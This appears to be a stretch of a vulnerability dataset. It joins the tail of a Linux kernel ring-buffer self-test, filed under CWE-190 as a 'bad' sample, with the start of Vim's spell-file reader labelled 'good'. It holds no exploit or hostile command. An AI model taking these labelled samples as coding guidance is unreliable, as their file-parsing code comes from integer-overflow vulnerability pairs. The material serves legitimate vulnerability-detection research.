big_event_size = data->max_size + data->max_size_nested;
small_event_size = data->min_size + data->min_size_nested;
pr_info("CPU %d:\n", cpu);
pr_info(" events: %ld\n", total_events);
pr_info(" dropped bytes: %ld\n", total_dropped);
pr_info(" alloced bytes: %ld\n", total_alloc);
pr_info(" written bytes: %ld\n", total_written);
pr_info(" biggest event: %d\n", big_event_size);
pr_info(" smallest event: %d\n", small_event_size);
if (RB_WARN_ON(buffer, total_dropped))
break;
ret = 0;
while ((event = ring_buffer_consume(buffer, cpu, NULL, &lost))) {
total_lost += lost;
item = ring_buffer_event_data(event);
total_len += ring_buffer_event_length(event);
total_size += item->size + sizeof(struct rb_item);
if (memcmp(&item->str[0], rb_string, item->size) != 0) {
pr_info("FAILED!\n");
pr_info("buffer had: %.*s\n", item->size, item->str);
pr_info("expected: %.*s\n", item->size, rb_string);
RB_WARN_ON(buffer, 1);
ret = -1;
break;
}
total_read++;
}
if (ret)
break;
ret = -1;
pr_info(" read events: %ld\n", total_read);
pr_info(" lost events: %ld\n", total_lost);
pr_info(" total events: %ld\n", total_lost + total_read);
pr_info(" recorded len bytes: %ld\n", total_len);
pr_info(" recorded size bytes: %ld\n", total_size);
if (total_lost)
pr_info(" With dropped events, record len and size may not match\n"
" alloced and written from above\n");
if (!total_lost) {
if (RB_WARN_ON(buffer, total_len != total_alloc ||
total_size != total_written))
break;
}
if (RB_WARN_ON(buffer, total_lost + total_read != total_events))
break;
ret = 0;
}
if (!ret)
pr_info("Ring buffer PASSED!\n");
ring_buffer_free(buffer);
return 0;
}
late_initcall(test_ringbuffer);
#endif /* CONFIG_RING_BUFFER_STARTUP_TEST */
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_5498_0 |
crossvul-cpp_data_good_3153_0 | /* vi:set ts=8 sts=4 sw=4 noet:
*
* VIM - Vi IMproved by Bram Moolenaar
*
* Do ":help uganda" in Vim to read copying and usage conditions.
* Do ":help credits" in Vim to see a list of people who contributed.
* See README.txt for an overview of the Vim source code.
*/
/*
* spellfile.c: code for reading and writing spell files.
*
* See spell.c for information about spell checking.
*/
/*
* Vim spell file format: <HEADER>
* <SECTIONS>
* <LWORDTREE>
* <KWORDTREE>
* <PREFIXTREE>
*
* <HEADER>: <fileID> <versionnr>
*
* <fileID> 8 bytes "VIMspell"
* <versionnr> 1 byte VIMSPELLVERSION
*
*
* Sections make it possible to add information to the .spl file without
* making it incompatible with previous versions. There are two kinds of
* sections:
* 1. Not essential for correct spell checking. E.g. for making suggestions.
* These are skipped when not supported.
* 2. Optional information, but essential for spell checking when present.
* E.g. conditions for affixes. When this section is present but not
* supported an error message is given.
*
* <SECTIONS>: <section> ... <sectionend>
*
* <section>: <sectionID> <sectionflags> <sectionlen> (section contents)
*
* <sectionID> 1 byte number from 0 to 254 identifying the section
*
* <sectionflags> 1 byte SNF_REQUIRED: this section is required for correct
* spell checking
*
* <sectionlen> 4 bytes length of section contents, MSB first
*
* <sectionend> 1 byte SN_END
*
*
* sectionID == SN_INFO: <infotext>
* <infotext> N bytes free format text with spell file info (version,
* website, etc)
*
* sectionID == SN_REGION: <regionname> ...
* <regionname> 2 bytes Up to 8 region names: ca, au, etc. Lower case.
* First <regionname> is region 1.
*
* sectionID == SN_CHARFLAGS: <charflagslen> <charflags>
* <folcharslen> <folchars>
* <charflagslen> 1 byte Number of bytes in <charflags> (should be 128).
* <charflags> N bytes List of flags (first one is for character 128):
* 0x01 word character CF_WORD
* 0x02 upper-case character CF_UPPER
* <folcharslen> 2 bytes Number of bytes in <folchars>.
* <folchars> N bytes Folded characters, first one is for character 128.
*
* sectionID == SN_MIDWORD: <midword>
* <midword> N bytes Characters that are word characters only when used
* in the middle of a word.
*
* sectionID == SN_PREFCOND: <prefcondcnt> <prefcond> ...
* <prefcondcnt> 2 bytes Number of <prefcond> items following.
* <prefcond> : <condlen> <condstr>
* <condlen> 1 byte Length of <condstr>.
* <condstr> N bytes Condition for the prefix.
*
* sectionID == SN_REP: <repcount> <rep> ...
* <repcount> 2 bytes number of <rep> items, MSB first.
* <rep> : <repfromlen> <repfrom> <reptolen> <repto>
* <repfromlen> 1 byte length of <repfrom>
* <repfrom> N bytes "from" part of replacement
* <reptolen> 1 byte length of <repto>
* <repto> N bytes "to" part of replacement
*
* sectionID == SN_REPSAL: <repcount> <rep> ...
* just like SN_REP but for soundfolded words
*
* sectionID == SN_SAL: <salflags> <salcount> <sal> ...
* <salflags> 1 byte flags for soundsalike conversion:
* SAL_F0LLOWUP
* SAL_COLLAPSE
* SAL_REM_ACCENTS
* <salcount> 2 bytes number of <sal> items following
* <sal> : <salfromlen> <salfrom> <saltolen> <salto>
* <salfromlen> 1 byte length of <salfrom>
* <salfrom> N bytes "from" part of soundsalike
* <saltolen> 1 byte length of <salto>
* <salto> N bytes "to" part of soundsalike
*
* sectionID == SN_SOFO: <sofofromlen> <sofofrom> <sofotolen> <sofoto>
* <sofofromlen> 2 bytes length of <sofofrom>
* <sofofrom> N bytes "from" part of soundfold
* <sofotolen> 2 bytes length of <sofoto>
* <sofoto> N bytes "to" part of soundfold
*
* sectionID == SN_SUGFILE: <timestamp>
* <timestamp> 8 bytes time in seconds that must match with .sug file
*
* sectionID == SN_NOSPLITSUGS: nothing
*
* sectionID == SN_NOCOMPOUNDSUGS: nothing
*
* sectionID == SN_WORDS: <word> ...
* <word> N bytes NUL terminated common word
*
* sectionID == SN_MAP: <mapstr>
* <mapstr> N bytes String with sequences of similar characters,
* separated by slashes.
*
* sectionID == SN_COMPOUND: <compmax> <compminlen> <compsylmax> <compoptions>
* <comppatcount> <comppattern> ... <compflags>
* <compmax> 1 byte Maximum nr of words in compound word.
* <compminlen> 1 byte Minimal word length for compounding.
* <compsylmax> 1 byte Maximum nr of syllables in compound word.
* <compoptions> 2 bytes COMP_ flags.
* <comppatcount> 2 bytes number of <comppattern> following
* <compflags> N bytes Flags from COMPOUNDRULE items, separated by
* slashes.
*
* <comppattern>: <comppatlen> <comppattext>
* <comppatlen> 1 byte length of <comppattext>
* <comppattext> N bytes end or begin chars from CHECKCOMPOUNDPATTERN
*
* sectionID == SN_NOBREAK: (empty, its presence is what matters)
*
* sectionID == SN_SYLLABLE: <syllable>
* <syllable> N bytes String from SYLLABLE item.
*
* <LWORDTREE>: <wordtree>
*
* <KWORDTREE>: <wordtree>
*
* <PREFIXTREE>: <wordtree>
*
*
* <wordtree>: <nodecount> <nodedata> ...
*
* <nodecount> 4 bytes Number of nodes following. MSB first.
*
* <nodedata>: <siblingcount> <sibling> ...
*
* <siblingcount> 1 byte Number of siblings in this node. The siblings
* follow in sorted order.
*
* <sibling>: <byte> [ <nodeidx> <xbyte>
* | <flags> [<flags2>] [<region>] [<affixID>]
* | [<pflags>] <affixID> <prefcondnr> ]
*
* <byte> 1 byte Byte value of the sibling. Special cases:
* BY_NOFLAGS: End of word without flags and for all
* regions.
* For PREFIXTREE <affixID> and
* <prefcondnr> follow.
* BY_FLAGS: End of word, <flags> follow.
* For PREFIXTREE <pflags>, <affixID>
* and <prefcondnr> follow.
* BY_FLAGS2: End of word, <flags> and <flags2>
* follow. Not used in PREFIXTREE.
* BY_INDEX: Child of sibling is shared, <nodeidx>
* and <xbyte> follow.
*
* <nodeidx> 3 bytes Index of child for this sibling, MSB first.
*
* <xbyte> 1 byte byte value of the sibling.
*
* <flags> 1 byte bitmask of:
* WF_ALLCAP word must have only capitals
* WF_ONECAP first char of word must be capital
* WF_KEEPCAP keep-case word
* WF_FIXCAP keep-case word, all caps not allowed
* WF_RARE rare word
* WF_BANNED bad word
* WF_REGION <region> follows
* WF_AFX <affixID> follows
*
* <flags2> 1 byte Bitmask of:
* WF_HAS_AFF >> 8 word includes affix
* WF_NEEDCOMP >> 8 word only valid in compound
* WF_NOSUGGEST >> 8 word not used for suggestions
* WF_COMPROOT >> 8 word already a compound
* WF_NOCOMPBEF >> 8 no compounding before this word
* WF_NOCOMPAFT >> 8 no compounding after this word
*
* <pflags> 1 byte bitmask of:
* WFP_RARE rare prefix
* WFP_NC non-combining prefix
* WFP_UP letter after prefix made upper case
*
* <region> 1 byte Bitmask for regions in which word is valid. When
* omitted it's valid in all regions.
* Lowest bit is for region 1.
*
* <affixID> 1 byte ID of affix that can be used with this word. In
* PREFIXTREE used for the required prefix ID.
*
* <prefcondnr> 2 bytes Prefix condition number, index in <prefcond> list
* from HEADER.
*
* All text characters are in 'encoding', but stored as single bytes.
*/
/*
* Vim .sug file format: <SUGHEADER>
* <SUGWORDTREE>
* <SUGTABLE>
*
* <SUGHEADER>: <fileID> <versionnr> <timestamp>
*
* <fileID> 6 bytes "VIMsug"
* <versionnr> 1 byte VIMSUGVERSION
* <timestamp> 8 bytes timestamp that must match with .spl file
*
*
* <SUGWORDTREE>: <wordtree> (see above, no flags or region used)
*
*
* <SUGTABLE>: <sugwcount> <sugline> ...
*
* <sugwcount> 4 bytes number of <sugline> following
*
* <sugline>: <sugnr> ... NUL
*
* <sugnr>: X bytes word number that results in this soundfolded word,
* stored as an offset to the previous number in as
* few bytes as possible, see offset2bytes())
*/
#include "vim.h"
#if defined(FEAT_SPELL) || defined(PROTO)
#ifndef UNIX /* it's in os_unix.h for Unix */
# include <time.h> /* for time_t */
#endif
#ifndef UNIX /* it's in os_unix.h for Unix */
# include <time.h> /* for time_t */
#endif
/* Special byte values for <byte>. Some are only used in the tree for
* postponed prefixes, some only in the other trees. This is a bit messy... */
#define BY_NOFLAGS 0 /* end of word without flags or region; for
* postponed prefix: no <pflags> */
#define BY_INDEX 1 /* child is shared, index follows */
#define BY_FLAGS 2 /* end of word, <flags> byte follows; for
* postponed prefix: <pflags> follows */
#define BY_FLAGS2 3 /* end of word, <flags> and <flags2> bytes
* follow; never used in prefix tree */
#define BY_SPECIAL BY_FLAGS2 /* highest special byte value */
/* Flags used in .spl file for soundsalike flags. */
#define SAL_F0LLOWUP 1
#define SAL_COLLAPSE 2
#define SAL_REM_ACCENTS 4
#define VIMSPELLMAGIC "VIMspell" /* string at start of Vim spell file */
#define VIMSPELLMAGICL 8
#define VIMSPELLVERSION 50
/* Section IDs. Only renumber them when VIMSPELLVERSION changes! */
#define SN_REGION 0 /* <regionname> section */
#define SN_CHARFLAGS 1 /* charflags section */
#define SN_MIDWORD 2 /* <midword> section */
#define SN_PREFCOND 3 /* <prefcond> section */
#define SN_REP 4 /* REP items section */
#define SN_SAL 5 /* SAL items section */
#define SN_SOFO 6 /* soundfolding section */
#define SN_MAP 7 /* MAP items section */
#define SN_COMPOUND 8 /* compound words section */
#define SN_SYLLABLE 9 /* syllable section */
#define SN_NOBREAK 10 /* NOBREAK section */
#define SN_SUGFILE 11 /* timestamp for .sug file */
#define SN_REPSAL 12 /* REPSAL items section */
#define SN_WORDS 13 /* common words */
#define SN_NOSPLITSUGS 14 /* don't split word for suggestions */
#define SN_INFO 15 /* info section */
#define SN_NOCOMPOUNDSUGS 16 /* don't compound for suggestions */
#define SN_END 255 /* end of sections */
#define SNF_REQUIRED 1 /* <sectionflags>: required section */
#define CF_WORD 0x01
#define CF_UPPER 0x02
static int set_spell_finish(spelltab_T *new_st);
static int write_spell_prefcond(FILE *fd, garray_T *gap);
static char_u *read_cnt_string(FILE *fd, int cnt_bytes, int *lenp);
static int read_region_section(FILE *fd, slang_T *slang, int len);
static int read_charflags_section(FILE *fd);
static int read_prefcond_section(FILE *fd, slang_T *lp);
static int read_rep_section(FILE *fd, garray_T *gap, short *first);
static int read_sal_section(FILE *fd, slang_T *slang);
static int read_words_section(FILE *fd, slang_T *lp, int len);
static int read_sofo_section(FILE *fd, slang_T *slang);
static int read_compound(FILE *fd, slang_T *slang, int len);
static int set_sofo(slang_T *lp, char_u *from, char_u *to);
static void set_sal_first(slang_T *lp);
#ifdef FEAT_MBYTE
static int *mb_str2wide(char_u *s);
#endif
static int spell_read_tree(FILE *fd, char_u **bytsp, idx_T **idxsp, int prefixtree, int prefixcnt);
static idx_T read_tree_node(FILE *fd, char_u *byts, idx_T *idxs, int maxidx, idx_T startidx, int prefixtree, int maxprefcondnr);
static void spell_reload_one(char_u *fname, int added_word);
static void set_spell_charflags(char_u *flags, int cnt, char_u *upp);
static int set_spell_chartab(char_u *fol, char_u *low, char_u *upp);
static void set_map_str(slang_T *lp, char_u *map);
static char *e_spell_trunc = N_("E758: Truncated spell file");
static char *e_afftrailing = N_("Trailing text in %s line %d: %s");
static char *e_affname = N_("Affix name too long in %s line %d: %s");
static char *e_affform = N_("E761: Format error in affix file FOL, LOW or UPP");
static char *e_affrange = N_("E762: Character in FOL, LOW or UPP is out of range");
static char *msg_compressing = N_("Compressing word tree...");
/*
* Load one spell file and store the info into a slang_T.
*
* This is invoked in three ways:
* - From spell_load_cb() to load a spell file for the first time. "lang" is
* the language name, "old_lp" is NULL. Will allocate an slang_T.
* - To reload a spell file that was changed. "lang" is NULL and "old_lp"
* points to the existing slang_T.
* - Just after writing a .spl file; it's read back to produce the .sug file.
* "old_lp" is NULL and "lang" is NULL. Will allocate an slang_T.
*
* Returns the slang_T the spell file was loaded into. NULL for error.
*/
slang_T *
spell_load_file(
char_u *fname,
char_u *lang,
slang_T *old_lp,
int silent) /* no error if file doesn't exist */
{
FILE *fd;
char_u buf[VIMSPELLMAGICL];
char_u *p;
int i;
int n;
int len;
char_u *save_sourcing_name = sourcing_name;
linenr_T save_sourcing_lnum = sourcing_lnum;
slang_T *lp = NULL;
int c = 0;
int res;
fd = mch_fopen((char *)fname, "r");
if (fd == NULL)
{
if (!silent)
EMSG2(_(e_notopen), fname);
else if (p_verbose > 2)
{
verbose_enter();
smsg((char_u *)e_notopen, fname);
verbose_leave();
}
goto endFAIL;
}
if (p_verbose > 2)
{
verbose_enter();
smsg((char_u *)_("Reading spell file \"%s\""), fname);
verbose_leave();
}
if (old_lp == NULL)
{
lp = slang_alloc(lang);
if (lp == NULL)
goto endFAIL;
/* Remember the file name, used to reload the file when it's updated. */
lp->sl_fname = vim_strsave(fname);
if (lp->sl_fname == NULL)
goto endFAIL;
/* Check for .add.spl (_add.spl for VMS). */
lp->sl_add = strstr((char *)gettail(fname), SPL_FNAME_ADD) != NULL;
}
else
lp = old_lp;
/* Set sourcing_name, so that error messages mention the file name. */
sourcing_name = fname;
sourcing_lnum = 0;
/*
* <HEADER>: <fileID>
*/
for (i = 0; i < VIMSPELLMAGICL; ++i)
buf[i] = getc(fd); /* <fileID> */
if (STRNCMP(buf, VIMSPELLMAGIC, VIMSPELLMAGICL) != 0)
{
EMSG(_("E757: This does not look like a spell file"));
goto endFAIL;
}
c = getc(fd); /* <versionnr> */
if (c < VIMSPELLVERSION)
{
EMSG(_("E771: Old spell file, needs to be updated"));
goto endFAIL;
}
else if (c > VIMSPELLVERSION)
{
EMSG(_("E772: Spell file is for newer version of Vim"));
goto endFAIL;
}
/*
* <SECTIONS>: <section> ... <sectionend>
* <section>: <sectionID> <sectionflags> <sectionlen> (section contents)
*/
for (;;)
{
n = getc(fd); /* <sectionID> or <sectionend> */
if (n == SN_END)
break;
c = getc(fd); /* <sectionflags> */
len = get4c(fd); /* <sectionlen> */
if (len < 0)
goto truncerr;
res = 0;
switch (n)
{
case SN_INFO:
lp->sl_info = read_string(fd, len); /* <infotext> */
if (lp->sl_info == NULL)
goto endFAIL;
break;
case SN_REGION:
res = read_region_section(fd, lp, len);
break;
case SN_CHARFLAGS:
res = read_charflags_section(fd);
break;
case SN_MIDWORD:
lp->sl_midword = read_string(fd, len); /* <midword> */
if (lp->sl_midword == NULL)
goto endFAIL;
break;
case SN_PREFCOND:
res = read_prefcond_section(fd, lp);
break;
case SN_REP:
res = read_rep_section(fd, &lp->sl_rep, lp->sl_rep_first);
break;
case SN_REPSAL:
res = read_rep_section(fd, &lp->sl_repsal, lp->sl_repsal_first);
break;
case SN_SAL:
res = read_sal_section(fd, lp);
break;
case SN_SOFO:
res = read_sofo_section(fd, lp);
break;
case SN_MAP:
p = read_string(fd, len); /* <mapstr> */
if (p == NULL)
goto endFAIL;
set_map_str(lp, p);
vim_free(p);
break;
case SN_WORDS:
res = read_words_section(fd, lp, len);
break;
case SN_SUGFILE:
lp->sl_sugtime = get8ctime(fd); /* <timestamp> */
break;
case SN_NOSPLITSUGS:
lp->sl_nosplitsugs = TRUE;
break;
case SN_NOCOMPOUNDSUGS:
lp->sl_nocompoundsugs = TRUE;
break;
case SN_COMPOUND:
res = read_compound(fd, lp, len);
break;
case SN_NOBREAK:
lp->sl_nobreak = TRUE;
break;
case SN_SYLLABLE:
lp->sl_syllable = read_string(fd, len); /* <syllable> */
if (lp->sl_syllable == NULL)
goto endFAIL;
if (init_syl_tab(lp) == FAIL)
goto endFAIL;
break;
default:
/* Unsupported section. When it's required give an error
* message. When it's not required skip the contents. */
if (c & SNF_REQUIRED)
{
EMSG(_("E770: Unsupported section in spell file"));
goto endFAIL;
}
while (--len >= 0)
if (getc(fd) < 0)
goto truncerr;
break;
}
someerror:
if (res == SP_FORMERROR)
{
EMSG(_(e_format));
goto endFAIL;
}
if (res == SP_TRUNCERROR)
{
truncerr:
EMSG(_(e_spell_trunc));
goto endFAIL;
}
if (res == SP_OTHERERROR)
goto endFAIL;
}
/* <LWORDTREE> */
res = spell_read_tree(fd, &lp->sl_fbyts, &lp->sl_fidxs, FALSE, 0);
if (res != 0)
goto someerror;
/* <KWORDTREE> */
res = spell_read_tree(fd, &lp->sl_kbyts, &lp->sl_kidxs, FALSE, 0);
if (res != 0)
goto someerror;
/* <PREFIXTREE> */
res = spell_read_tree(fd, &lp->sl_pbyts, &lp->sl_pidxs, TRUE,
lp->sl_prefixcnt);
if (res != 0)
goto someerror;
/* For a new file link it in the list of spell files. */
if (old_lp == NULL && lang != NULL)
{
lp->sl_next = first_lang;
first_lang = lp;
}
goto endOK;
endFAIL:
if (lang != NULL)
/* truncating the name signals the error to spell_load_lang() */
*lang = NUL;
if (lp != NULL && old_lp == NULL)
slang_free(lp);
lp = NULL;
endOK:
if (fd != NULL)
fclose(fd);
sourcing_name = save_sourcing_name;
sourcing_lnum = save_sourcing_lnum;
return lp;
}
/*
* Fill in the wordcount fields for a trie.
* Returns the total number of words.
*/
static void
tree_count_words(char_u *byts, idx_T *idxs)
{
int depth;
idx_T arridx[MAXWLEN];
int curi[MAXWLEN];
int c;
idx_T n;
int wordcount[MAXWLEN];
arridx[0] = 0;
curi[0] = 1;
wordcount[0] = 0;
depth = 0;
while (depth >= 0 && !got_int)
{
if (curi[depth] > byts[arridx[depth]])
{
/* Done all bytes at this node, go up one level. */
idxs[arridx[depth]] = wordcount[depth];
if (depth > 0)
wordcount[depth - 1] += wordcount[depth];
--depth;
fast_breakcheck();
}
else
{
/* Do one more byte at this node. */
n = arridx[depth] + curi[depth];
++curi[depth];
c = byts[n];
if (c == 0)
{
/* End of word, count it. */
++wordcount[depth];
/* Skip over any other NUL bytes (same word with different
* flags). */
while (byts[n + 1] == 0)
{
++n;
++curi[depth];
}
}
else
{
/* Normal char, go one level deeper to count the words. */
++depth;
arridx[depth] = idxs[n];
curi[depth] = 1;
wordcount[depth] = 0;
}
}
}
}
/*
* Load the .sug files for languages that have one and weren't loaded yet.
*/
void
suggest_load_files(void)
{
langp_T *lp;
int lpi;
slang_T *slang;
char_u *dotp;
FILE *fd;
char_u buf[MAXWLEN];
int i;
time_t timestamp;
int wcount;
int wordnr;
garray_T ga;
int c;
/* Do this for all languages that support sound folding. */
for (lpi = 0; lpi < curwin->w_s->b_langp.ga_len; ++lpi)
{
lp = LANGP_ENTRY(curwin->w_s->b_langp, lpi);
slang = lp->lp_slang;
if (slang->sl_sugtime != 0 && !slang->sl_sugloaded)
{
/* Change ".spl" to ".sug" and open the file. When the file isn't
* found silently skip it. Do set "sl_sugloaded" so that we
* don't try again and again. */
slang->sl_sugloaded = TRUE;
dotp = vim_strrchr(slang->sl_fname, '.');
if (dotp == NULL || fnamecmp(dotp, ".spl") != 0)
continue;
STRCPY(dotp, ".sug");
fd = mch_fopen((char *)slang->sl_fname, "r");
if (fd == NULL)
goto nextone;
/*
* <SUGHEADER>: <fileID> <versionnr> <timestamp>
*/
for (i = 0; i < VIMSUGMAGICL; ++i)
buf[i] = getc(fd); /* <fileID> */
if (STRNCMP(buf, VIMSUGMAGIC, VIMSUGMAGICL) != 0)
{
EMSG2(_("E778: This does not look like a .sug file: %s"),
slang->sl_fname);
goto nextone;
}
c = getc(fd); /* <versionnr> */
if (c < VIMSUGVERSION)
{
EMSG2(_("E779: Old .sug file, needs to be updated: %s"),
slang->sl_fname);
goto nextone;
}
else if (c > VIMSUGVERSION)
{
EMSG2(_("E780: .sug file is for newer version of Vim: %s"),
slang->sl_fname);
goto nextone;
}
/* Check the timestamp, it must be exactly the same as the one in
* the .spl file. Otherwise the word numbers won't match. */
timestamp = get8ctime(fd); /* <timestamp> */
if (timestamp != slang->sl_sugtime)
{
EMSG2(_("E781: .sug file doesn't match .spl file: %s"),
slang->sl_fname);
goto nextone;
}
/*
* <SUGWORDTREE>: <wordtree>
* Read the trie with the soundfolded words.
*/
if (spell_read_tree(fd, &slang->sl_sbyts, &slang->sl_sidxs,
FALSE, 0) != 0)
{
someerror:
EMSG2(_("E782: error while reading .sug file: %s"),
slang->sl_fname);
slang_clear_sug(slang);
goto nextone;
}
/*
* <SUGTABLE>: <sugwcount> <sugline> ...
*
* Read the table with word numbers. We use a file buffer for
* this, because it's so much like a file with lines. Makes it
* possible to swap the info and save on memory use.
*/
slang->sl_sugbuf = open_spellbuf();
if (slang->sl_sugbuf == NULL)
goto someerror;
/* <sugwcount> */
wcount = get4c(fd);
if (wcount < 0)
goto someerror;
/* Read all the wordnr lists into the buffer, one NUL terminated
* list per line. */
ga_init2(&ga, 1, 100);
for (wordnr = 0; wordnr < wcount; ++wordnr)
{
ga.ga_len = 0;
for (;;)
{
c = getc(fd); /* <sugline> */
if (c < 0 || ga_grow(&ga, 1) == FAIL)
goto someerror;
((char_u *)ga.ga_data)[ga.ga_len++] = c;
if (c == NUL)
break;
}
if (ml_append_buf(slang->sl_sugbuf, (linenr_T)wordnr,
ga.ga_data, ga.ga_len, TRUE) == FAIL)
goto someerror;
}
ga_clear(&ga);
/*
* Need to put word counts in the word tries, so that we can find
* a word by its number.
*/
tree_count_words(slang->sl_fbyts, slang->sl_fidxs);
tree_count_words(slang->sl_sbyts, slang->sl_sidxs);
nextone:
if (fd != NULL)
fclose(fd);
STRCPY(dotp, ".spl");
}
}
}
/*
* Read a length field from "fd" in "cnt_bytes" bytes.
* Allocate memory, read the string into it and add a NUL at the end.
* Returns NULL when the count is zero.
* Sets "*cntp" to SP_*ERROR when there is an error, length of the result
* otherwise.
*/
static char_u *
read_cnt_string(FILE *fd, int cnt_bytes, int *cntp)
{
int cnt = 0;
int i;
char_u *str;
/* read the length bytes, MSB first */
for (i = 0; i < cnt_bytes; ++i)
cnt = (cnt << 8) + getc(fd);
if (cnt < 0)
{
*cntp = SP_TRUNCERROR;
return NULL;
}
*cntp = cnt;
if (cnt == 0)
return NULL; /* nothing to read, return NULL */
str = read_string(fd, cnt);
if (str == NULL)
*cntp = SP_OTHERERROR;
return str;
}
/*
* Read SN_REGION: <regionname> ...
* Return SP_*ERROR flags.
*/
static int
read_region_section(FILE *fd, slang_T *lp, int len)
{
int i;
if (len > 16)
return SP_FORMERROR;
for (i = 0; i < len; ++i)
lp->sl_regions[i] = getc(fd); /* <regionname> */
lp->sl_regions[len] = NUL;
return 0;
}
/*
* Read SN_CHARFLAGS section: <charflagslen> <charflags>
* <folcharslen> <folchars>
* Return SP_*ERROR flags.
*/
static int
read_charflags_section(FILE *fd)
{
char_u *flags;
char_u *fol;
int flagslen, follen;
/* <charflagslen> <charflags> */
flags = read_cnt_string(fd, 1, &flagslen);
if (flagslen < 0)
return flagslen;
/* <folcharslen> <folchars> */
fol = read_cnt_string(fd, 2, &follen);
if (follen < 0)
{
vim_free(flags);
return follen;
}
/* Set the word-char flags and fill SPELL_ISUPPER() table. */
if (flags != NULL && fol != NULL)
set_spell_charflags(flags, flagslen, fol);
vim_free(flags);
vim_free(fol);
/* When <charflagslen> is zero then <fcharlen> must also be zero. */
if ((flags == NULL) != (fol == NULL))
return SP_FORMERROR;
return 0;
}
/*
* Read SN_PREFCOND section.
* Return SP_*ERROR flags.
*/
static int
read_prefcond_section(FILE *fd, slang_T *lp)
{
int cnt;
int i;
int n;
char_u *p;
char_u buf[MAXWLEN + 1];
/* <prefcondcnt> <prefcond> ... */
cnt = get2c(fd); /* <prefcondcnt> */
if (cnt <= 0)
return SP_FORMERROR;
lp->sl_prefprog = (regprog_T **)alloc_clear(
(unsigned)sizeof(regprog_T *) * cnt);
if (lp->sl_prefprog == NULL)
return SP_OTHERERROR;
lp->sl_prefixcnt = cnt;
for (i = 0; i < cnt; ++i)
{
/* <prefcond> : <condlen> <condstr> */
n = getc(fd); /* <condlen> */
if (n < 0 || n >= MAXWLEN)
return SP_FORMERROR;
/* When <condlen> is zero we have an empty condition. Otherwise
* compile the regexp program used to check for the condition. */
if (n > 0)
{
buf[0] = '^'; /* always match at one position only */
p = buf + 1;
while (n-- > 0)
*p++ = getc(fd); /* <condstr> */
*p = NUL;
lp->sl_prefprog[i] = vim_regcomp(buf, RE_MAGIC + RE_STRING);
}
}
return 0;
}
/*
* Read REP or REPSAL items section from "fd": <repcount> <rep> ...
* Return SP_*ERROR flags.
*/
static int
read_rep_section(FILE *fd, garray_T *gap, short *first)
{
int cnt;
fromto_T *ftp;
int i;
cnt = get2c(fd); /* <repcount> */
if (cnt < 0)
return SP_TRUNCERROR;
if (ga_grow(gap, cnt) == FAIL)
return SP_OTHERERROR;
/* <rep> : <repfromlen> <repfrom> <reptolen> <repto> */
for (; gap->ga_len < cnt; ++gap->ga_len)
{
ftp = &((fromto_T *)gap->ga_data)[gap->ga_len];
ftp->ft_from = read_cnt_string(fd, 1, &i);
if (i < 0)
return i;
if (i == 0)
return SP_FORMERROR;
ftp->ft_to = read_cnt_string(fd, 1, &i);
if (i <= 0)
{
vim_free(ftp->ft_from);
if (i < 0)
return i;
return SP_FORMERROR;
}
}
/* Fill the first-index table. */
for (i = 0; i < 256; ++i)
first[i] = -1;
for (i = 0; i < gap->ga_len; ++i)
{
ftp = &((fromto_T *)gap->ga_data)[i];
if (first[*ftp->ft_from] == -1)
first[*ftp->ft_from] = i;
}
return 0;
}
/*
* Read SN_SAL section: <salflags> <salcount> <sal> ...
* Return SP_*ERROR flags.
*/
static int
read_sal_section(FILE *fd, slang_T *slang)
{
int i;
int cnt;
garray_T *gap;
salitem_T *smp;
int ccnt;
char_u *p;
int c = NUL;
slang->sl_sofo = FALSE;
i = getc(fd); /* <salflags> */
if (i & SAL_F0LLOWUP)
slang->sl_followup = TRUE;
if (i & SAL_COLLAPSE)
slang->sl_collapse = TRUE;
if (i & SAL_REM_ACCENTS)
slang->sl_rem_accents = TRUE;
cnt = get2c(fd); /* <salcount> */
if (cnt < 0)
return SP_TRUNCERROR;
gap = &slang->sl_sal;
ga_init2(gap, sizeof(salitem_T), 10);
if (ga_grow(gap, cnt + 1) == FAIL)
return SP_OTHERERROR;
/* <sal> : <salfromlen> <salfrom> <saltolen> <salto> */
for (; gap->ga_len < cnt; ++gap->ga_len)
{
smp = &((salitem_T *)gap->ga_data)[gap->ga_len];
ccnt = getc(fd); /* <salfromlen> */
if (ccnt < 0)
return SP_TRUNCERROR;
if ((p = alloc(ccnt + 2)) == NULL)
return SP_OTHERERROR;
smp->sm_lead = p;
/* Read up to the first special char into sm_lead. */
for (i = 0; i < ccnt; ++i)
{
c = getc(fd); /* <salfrom> */
if (vim_strchr((char_u *)"0123456789(-<^$", c) != NULL)
break;
*p++ = c;
}
smp->sm_leadlen = (int)(p - smp->sm_lead);
*p++ = NUL;
/* Put (abc) chars in sm_oneof, if any. */
if (c == '(')
{
smp->sm_oneof = p;
for (++i; i < ccnt; ++i)
{
c = getc(fd); /* <salfrom> */
if (c == ')')
break;
*p++ = c;
}
*p++ = NUL;
if (++i < ccnt)
c = getc(fd);
}
else
smp->sm_oneof = NULL;
/* Any following chars go in sm_rules. */
smp->sm_rules = p;
if (i < ccnt)
/* store the char we got while checking for end of sm_lead */
*p++ = c;
for (++i; i < ccnt; ++i)
*p++ = getc(fd); /* <salfrom> */
*p++ = NUL;
/* <saltolen> <salto> */
smp->sm_to = read_cnt_string(fd, 1, &ccnt);
if (ccnt < 0)
{
vim_free(smp->sm_lead);
return ccnt;
}
#ifdef FEAT_MBYTE
if (has_mbyte)
{
/* convert the multi-byte strings to wide char strings */
smp->sm_lead_w = mb_str2wide(smp->sm_lead);
smp->sm_leadlen = mb_charlen(smp->sm_lead);
if (smp->sm_oneof == NULL)
smp->sm_oneof_w = NULL;
else
smp->sm_oneof_w = mb_str2wide(smp->sm_oneof);
if (smp->sm_to == NULL)
smp->sm_to_w = NULL;
else
smp->sm_to_w = mb_str2wide(smp->sm_to);
if (smp->sm_lead_w == NULL
|| (smp->sm_oneof_w == NULL && smp->sm_oneof != NULL)
|| (smp->sm_to_w == NULL && smp->sm_to != NULL))
{
vim_free(smp->sm_lead);
vim_free(smp->sm_to);
vim_free(smp->sm_lead_w);
vim_free(smp->sm_oneof_w);
vim_free(smp->sm_to_w);
return SP_OTHERERROR;
}
}
#endif
}
if (gap->ga_len > 0)
{
/* Add one extra entry to mark the end with an empty sm_lead. Avoids
* that we need to check the index every time. */
smp = &((salitem_T *)gap->ga_data)[gap->ga_len];
if ((p = alloc(1)) == NULL)
return SP_OTHERERROR;
p[0] = NUL;
smp->sm_lead = p;
smp->sm_leadlen = 0;
smp->sm_oneof = NULL;
smp->sm_rules = p;
smp->sm_to = NULL;
#ifdef FEAT_MBYTE
if (has_mbyte)
{
